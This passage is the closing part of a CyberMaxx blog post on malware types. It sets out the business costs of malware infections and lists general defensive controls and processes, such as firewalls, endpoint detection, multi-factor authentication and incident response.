• Using or having unpatched, out-of-date, or unsupported systems or applications (Vulnerabilities)

What are the Repercussions?

Left unchecked, these types of malware can caused immense damage to a business’ networks, products and services.
Some of the damage has resulted in:

• Costs to restore and rebuild systems, applications, and data
• Lost revenue from disruption of services (e.g., outages, degradation, etc.)
• Lost revenue from reputational impact associated with a confirmed breach (e.g., drop in stock prices, customer’s loss of confidence, etc.)
• Fees or fines derived from settlements and compensation
• Costs associated with cyber insurance providers, leveraging external counsel, and rebranding / marketing post breach

How Can I Protect Myself From Malware?

Due to the various malware types and delivery methods, it is important to have a comprehensive security system in place to keep your systems, network and data protected.

Some of the security controls that you can take to protect from malware include:

Technical Controls

• Network Intrusion Prevention Systems (Network Security)
• Application White-listing
• Firewalls
• Deep Packet Inspection
• Unified Threat Management Systems
• Anti-virus and Anti-spam Solutions
• Virtual Private Networks (VPN)
• Content Filtering
• Multi-factor Authentication (MFA)
• Endpoint Detection and Response (EDR)

Processes and Services

• Change Management
• Vulnerability Risk Management
• Disaster Recovery
• Digital Forensics
• Incident Response
• Training, Education, and Awareness Programs
• Threat Intelligence

It’s important to understand that every organization is unique, leveraging a variety of technology, hosting various services, and storing vast amounts of data. While there’s no guarantee that any one tool, service or control can detect or protect an organization from all malware, integrating a full complement of security controls, or a defense-in-depth strategy, can assist in lessening an organization’s susceptibility to attacks.

The post Variety is the Spice to Life: The Different Types of Malware appeared first on CyberMaxx.